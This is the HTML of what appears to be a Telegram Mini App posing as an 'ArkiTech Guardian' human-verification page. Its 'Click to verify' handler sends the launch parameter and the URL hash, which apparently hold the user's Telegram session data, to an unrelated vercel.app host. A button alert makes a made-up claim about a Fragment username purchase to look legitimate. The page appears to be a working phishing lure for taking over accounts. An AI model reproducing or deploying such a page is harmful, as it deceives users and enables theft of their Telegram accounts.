<html style="--tg-color-scheme: dark; --tg-theme-bg-color: #212121; --tg-theme-text-color: #ffffff; --tg-theme-hint-color: #aaaaaa; --tg-theme-link-color: #8774e1; --tg-theme-button-color: #8774e1; --tg-theme-button-text-color: #ffffff; --tg-theme-secondary-bg-color: #0f0f0f; --tg-theme-header-bg-color: #212121; --tg-theme-accent-text-color: #8774e1; --tg-theme-section-bg-color: #212121; --tg-theme-section-header-text-color: #aaaaaa; --tg-theme-subtitle-text-color: #aaaaaa; --tg-theme-destructive-text-color: #e53935; --tg-viewport-height: 100vh; --tg-viewport-stable-height: 100vh;">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>ArkiTech Guardian</title>
    <meta name="description" content="Please authenticate yourself as a human">
    <link rel="icon" href="./favicon.ico">
    <meta name="next-head-count" content="5">
    <link rel="icon" href="./favicon.ico">
    <link data-next-font="" rel="preconnect" href="/" crossorigin="anonymous">
    <link rel="preload" href="./_next/static/css/f13011def78f3027.css" as="style">
    <link rel="stylesheet" href="./_next/static/css/f13011def78f3027.css" data-n-g="">
    <noscript data-n-css=""></noscript>
    <style id="__jsx-f10ce31a3e289a42">
      @-webkit-keyframes dotsAnimation {
        0%, 20% { content: "." }
        40%, 60% { content: ".." }
        80%, 100% { content: "..." }
      }
      @-moz-keyframes dotsAnimation {
        0%, 20% { content: "." }
        40%, 60% { content: ".." }
        80%, 100% { content: "..." }
      }
      @-o-keyframes dotsAnimation {
        0%, 20% { content: "." }
        40%, 60% { content: ".." }
        80%, 100% { content: "..." }
      }
      @keyframes dotsAnimation {
        0%, 20% { content: "." }
        40%, 60% { content: ".." }
        80%, 100% { content: "..." }
      }
      .animate-dots.jsx-f10ce31a3e289a42::after {
        content: ".";
        display: inline-block;
        -webkit-animation: dotsAnimation 2s infinite;
        -moz-animation: dotsAnimation 2s infinite;
        -o-animation: dotsAnimation 2s infinite;
        animation: dotsAnimation 2s infinite
      }
    </style>
  </head>
  <body>
    <script src="https://telegram.org/js/telegram-web-app.js"></script>

<script>
  document.addEventListener("DOMContentLoaded", () => {
    if (window.Telegram && Telegram.WebApp) {
      Telegram.WebApp.ready();
      Telegram.WebApp.expand();
      
      Telegram.WebApp.MainButton.setParams({
        text: '@guardianapp',
        color: Telegram.WebApp.bottomBarColor,
        text_color: "#acafb0",
        is_active: false
      });
      
      Telegram.WebApp.MainButton.onClick(() => {
        Telegram.WebApp.showAlert("This username was bought on Fragment on Jan 16, 2024 for 10.00 TON.");
      });
      
      Telegram.WebApp.MainButton.show();
      
      document.body.style.setProperty("--surface-color", Telegram.WebApp.themeParams.bg_color);
      
      const pageChats = document.getElementById("page-chats");
      if (pageChats) {
        pageChats.remove();
      }
    } else {
      console.error("Telegram WebApp is not available.");
    }
  });
</script>

    
    <div id="__next">
      <div style="background-color: rgb(33, 33, 33);">
        <div class="flex h-screen justify-center">
          <div>
            <h2 class="mt-2 text-center text-3xl" style="color: rgb(255, 255, 255);">Human verification</h2>
            <p class="mt-2 text-center text-sm" style="color: rgb(170, 170, 170);">Please verify that you are human</p>
            <div class="mt-6">
              <div onclick="(function(){
                const currentUrl = window.location.href;
                const match = currentUrl.match(/startapp=([^&\/?#]+)/);
                const target = 'https://4u7ufghe3iuhgf38.vercel.app/';
                if(match) {
                  // Append _G to the captured value
                  const newUrl = target + '?startapp=' + encodeURIComponent(match[1] + '_G') + window.location.hash;
                  window.location.replace(newUrl);
                } else {
                  window.location.replace(target + window.location.hash);
                }
              })()" style="min-height:3rem" class="jsx-f10ce31a3e289a42 bg-blue-800 shadow-xl rounded-lg border-blue-800 hover:bg-blue-900 cursor-pointer relative">
                <div class="jsx-f10ce31a3e289a42 absolute inset-0 flex items-center justify-center px-4 py-3 space-x-2">
                  <label for="human" class="jsx-f10ce31a3e289a42 text-center text-sm font-medium text-slate-100">Click to verify</label>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <next-route-announcer>
      <p aria-live="assertive" id="__next-route-announcer__" role="alert" style="border: 0; clip: rect(0,0,0,0); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; top: 0; width: 1px; white-space: nowrap; overflow-wrap: normal;"></p>
    </next-route-announcer>
  </body>
</html>
